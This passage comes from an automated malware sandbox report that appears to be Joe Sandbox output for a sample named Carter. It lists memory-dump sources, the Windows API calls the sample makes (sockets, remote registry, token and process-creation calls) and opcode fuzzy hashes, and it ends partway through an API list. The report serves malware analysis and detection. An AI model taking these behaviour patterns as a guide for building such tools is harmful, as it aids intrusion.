                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 395352322-0
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 01066911
                                                                        • GetWindowLongW.USER32(011F5FB0,000000F0), ref: 01066944
                                                                        • GetWindowLongW.USER32(011F5FB0,000000F0), ref: 01066979
                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 010669AB
                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 010669D5
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 010669E6
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01066A00
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 2178440468-0
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0103E2CA
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0103E2F0
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0103E2F3
                                                                        • SysAllocString.OLEAUT32(?), ref: 0103E311
                                                                        • SysFreeString.OLEAUT32(?), ref: 0103E31A
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0103E33F
                                                                        • SysAllocString.OLEAUT32(?), ref: 0103E34D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        APIs
                                                                          • Part of subcall function 01058475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010584A0
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010568B1
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 010568C0
                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 010568F9
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 01056902
                                                                        • WSAGetLastError.WSOCK32 ref: 0105690C
                                                                        • closesocket.WSOCK32(00000000), ref: 01056935
                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0105694E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 910771015-0
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0103E3A5
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0103E3CB
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0103E3CE
                                                                        • SysAllocString.OLEAUT32 ref: 0103E3EF
                                                                        • SysFreeString.OLEAUT32 ref: 0103E3F8
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0103E412
                                                                        • SysAllocString.OLEAUT32(?), ref: 0103E420
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        APIs
                                                                          • Part of subcall function 00FE2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FE214F
                                                                          • Part of subcall function 00FE2111: GetStockObject.GDI32(00000011), ref: 00FE2163
                                                                          • Part of subcall function 00FE2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE216D
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01067C57
                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 01067C64
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 01067C6F
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01067C7E
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01067C8A
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 1025951953-3636473452
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,01004282,?), ref: 010041D3
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 010041DA
                                                                        • EncodePointer.KERNEL32(00000000), ref: 010041E6
                                                                        • DecodePointer.KERNEL32(00000001,01004282,?), ref: 01004203
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                        • String ID: RoInitialize$combase.dll
                                                                        • API String ID: 3489934621-340411864
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,010041A8), ref: 010042A8
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 010042AF
                                                                        • EncodePointer.KERNEL32(00000000), ref: 010042BA
                                                                        • DecodePointer.KERNEL32(010041A8), ref: 010042D5
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                        • String ID: RoUninitialize$combase.dll
                                                                        • API String ID: 3489934621-2819208100
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 00FE21B8
                                                                        • GetWindowRect.USER32(?,?), ref: 00FE21F9
                                                                        • ScreenToClient.USER32(?,?), ref: 00FE2221
                                                                        • GetClientRect.USER32(?,?), ref: 00FE2350
                                                                        • GetWindowRect.USER32(?,?), ref: 00FE2369
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$Screen
                                                                        • String ID:
                                                                        • API String ID: 1296646539-0
                                                                        • Opcode ID: 86d93ce78541c04505e090520dbebaaa4b0fe3e140366d53247ef6765d8e2abf
                                                                        • Instruction ID: 55108847b868a340db7969710cceb74d0a7cd64b88764c9e4efe8220c6921a69
                                                                        • Opcode Fuzzy Hash: 86d93ce78541c04505e090520dbebaaa4b0fe3e140366d53247ef6765d8e2abf
                                                                        • Instruction Fuzzy Hash: 45B16C39900289DFDF50CFA9C4807EDBBB5FF08310F148169ED99AB255EB35AA40DB64
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 3253778849-0
                                                                        • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                        • Instruction ID: b4793e5f9890a83cef54eb908c47383a25eec08760611f8dac791e50ba910b58
                                                                        • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                        • Instruction Fuzzy Hash: 1D61E17050029EABDF12EF64CC81EFE77A8AF06308F044569F9955B2E2EB35E905DB50
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0106147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0106091D
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0106095D
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01060980
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010609A9
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 010609EC
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 010609F9
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                        • String ID:
                                                                        • API String ID: 4046560759-0
                                                                        • Opcode ID: 0fc7c70473a393da2f666006c0253b291f7289d7d2ed6367716da223c0e5c6ba
                                                                        • Instruction ID: 251b7314835b9a3c41e996ee56d690976f0d7e5de692074a22b710c7d1cce273
                                                                        • Opcode Fuzzy Hash: 0fc7c70473a393da2f666006c0253b291f7289d7d2ed6367716da223c0e5c6ba
                                                                        • Instruction Fuzzy Hash: F4517831208245AFE711EB64C885EAEBBE9FF85310F04491DF5C5872A5DB35E905CBA2
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0103F6A2
                                                                        • VariantClear.OLEAUT32(00000013), ref: 0103F714
                                                                        • VariantClear.OLEAUT32(00000000), ref: 0103F76F
                                                                        • _memmove.LIBCMT ref: 0103F799
                                                                        • VariantClear.OLEAUT32(?), ref: 0103F7E6
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0103F814
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                        • String ID:
                                                                        • API String ID: 1101466143-0
                                                                        • Opcode ID: 351c1dbf5c15916fbb011dc9f401702876cdd6b8a7fe173adceb835e13ce2958
                                                                        • Instruction ID: 736b9faf2978ff21c956f76034f64ad4101fe7c62e61a276a4e6bdbc35a1920e
                                                                        • Opcode Fuzzy Hash: 351c1dbf5c15916fbb011dc9f401702876cdd6b8a7fe173adceb835e13ce2958
                                                                        • Instruction Fuzzy Hash: 76514FB5A0020AEFDB14CF58C884AAAB7F8FF89314B158559E999DB304D735E911CBA0
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 010429FF
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01042A4A
                                                                        • IsMenu.USER32(00000000), ref: 01042A6A
                                                                        • CreatePopupMenu.USER32 ref: 01042A9E
                                                                        • GetMenuItemCount.USER32(000000FF), ref: 01042AFC
                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01042B2D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                        • String ID:
                                                                        • API String ID: 3311875123-0
                                                                        • Opcode ID: 3b1b9e571978cb39734900e5bc4c4009864f94b9a045ea971024967d3fe9b2b3
                                                                        • Instruction ID: 9f0fd9dd5e7d8f288bd81a1eb857d6e8d37bb11dabf9ce579e5549c5f274d923
                                                                        • Opcode Fuzzy Hash: 3b1b9e571978cb39734900e5bc4c4009864f94b9a045ea971024967d3fe9b2b3
                                                                        • Instruction Fuzzy Hash: 2351A2B0B0030AEFDF25DF68E8C8AAEBBF4AF45314F1041A9F99197291D7709944CB91
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00FE1B76
                                                                        • GetWindowRect.USER32(?,?), ref: 00FE1BDA
                                                                        • ScreenToClient.USER32(?,?), ref: 00FE1BF7
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FE1C08
                                                                        • EndPaint.USER32(?,?), ref: 00FE1C52
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                        • String ID:
                                                                        • API String ID: 1827037458-0
                                                                        • Opcode ID: beb9b3aeec521fbe944b2fb45bde4d911a465c6dad316c16a7bbf247911c9d51
                                                                        • Instruction ID: 15dd7d914bbc97416ebedde6575ba41602027c9a7ad2a3bb1be567cfc60531bc
                                                                        • Opcode Fuzzy Hash: beb9b3aeec521fbe944b2fb45bde4d911a465c6dad316c16a7bbf247911c9d51
                                                                        • Instruction Fuzzy Hash: 2641E3315002409FD721DF2ACC84FBA7BF8FB49724F240668F595C72A5C7369804EB61
                                                                        APIs
                                                                        • ShowWindow.USER32(010A77B0,00000000,011F5FB0,?,?,010A77B0,?,0106BC1A,?,?), ref: 0106BD84
                                                                        • EnableWindow.USER32(?,00000000), ref: 0106BDA8
                                                                        • ShowWindow.USER32(010A77B0,00000000,011F5FB0,?,?,010A77B0,?,0106BC1A,?,?), ref: 0106BE08
                                                                        • ShowWindow.USER32(?,00000004,?,0106BC1A,?,?), ref: 0106BE1A
                                                                        • EnableWindow.USER32(?,00000001), ref: 0106BE3E
                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0106BE61
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: 2c8b620e59d838b10e2d58aed3a651cd290df9262b436b285cb96839798804cf
                                                                        • Instruction ID: f5e3cdaf1a597f36e51ea20e63c2366829a502268d4e476ec7dcb50bf32be06f
                                                                        • Opcode Fuzzy Hash: 2c8b620e59d838b10e2d58aed3a651cd290df9262b436b285cb96839798804cf
                                                                        • Instruction Fuzzy Hash: E6414DB4700144AFEB62DF28C889B947FE5BF05314F1841E9FA88CF2A6C732A845CB51
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,0105550C,?,?,00000000,00000001), ref: 01057796
                                                                          • Part of subcall function 0105406C: GetWindowRect.USER32(?,?), ref: 0105407F
                                                                        • GetDesktopWindow.USER32 ref: 010577C0
                                                                        • GetWindowRect.USER32(00000000), ref: 010577C7
                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 010577F9
                                                                          • Part of subcall function 010457FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01045877
                                                                        • GetCursorPos.USER32(?), ref: 01057825
                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01057883
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                        • String ID:
                                                                        • API String ID: 4137160315-0
                                                                        • Opcode ID: a61c54992b8b569d82a62262c17a1b3868205f2541c6878723767a8b5cc4cf2f
                                                                        • Instruction ID: 445e0a0586ac3b125a23eb4c8020f76cc24a3c4af456342b25f8daf6a26ea5bb
                                                                        • Opcode Fuzzy Hash: a61c54992b8b569d82a62262c17a1b3868205f2541c6878723767a8b5cc4cf2f
                                                                        • Instruction Fuzzy Hash: 6331C472504316ABD760DF14D848FABBBE9FF89314F000929F9C5A7181CB75E909CB92
                                                                        APIs
                                                                          • Part of subcall function 01038CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01038CDE
                                                                          • Part of subcall function 01038CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01038CE8
                                                                          • Part of subcall function 01038CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01038CF7
                                                                          • Part of subcall function 01038CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01038CFE
                                                                          • Part of subcall function 01038CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01038D14
                                                                        • GetLengthSid.ADVAPI32(?,00000000,0103904D), ref: 01039482
                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0103948E
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 01039495
                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 010394AE
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0103904D), ref: 010394C2
                                                                        • HeapFree.KERNEL32(00000000), ref: 010394C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                        • String ID:
                                                                        • API String ID: 3008561057-0
                                                                        • Opcode ID: dfbc5e6dd246a70c7b9e32b39dc83b94571bed6222ee96365a9cf9b8e5216267
                                                                        • Instruction ID: 6f993a2fac26f01711a2dab279e188db32cc488e396b3885b9dc9e754552184f
                                                                        • Opcode Fuzzy Hash: dfbc5e6dd246a70c7b9e32b39dc83b94571bed6222ee96365a9cf9b8e5216267
                                                                        • Instruction Fuzzy Hash: 9511A571501605FFEB508FA4DC09FAE7BADFB86315F108158F9C5A7104CB7A9900CB60
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 01039200
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 01039207
                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01039216
                                                                        • CloseHandle.KERNEL32(00000004), ref: 01039221
                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01039250
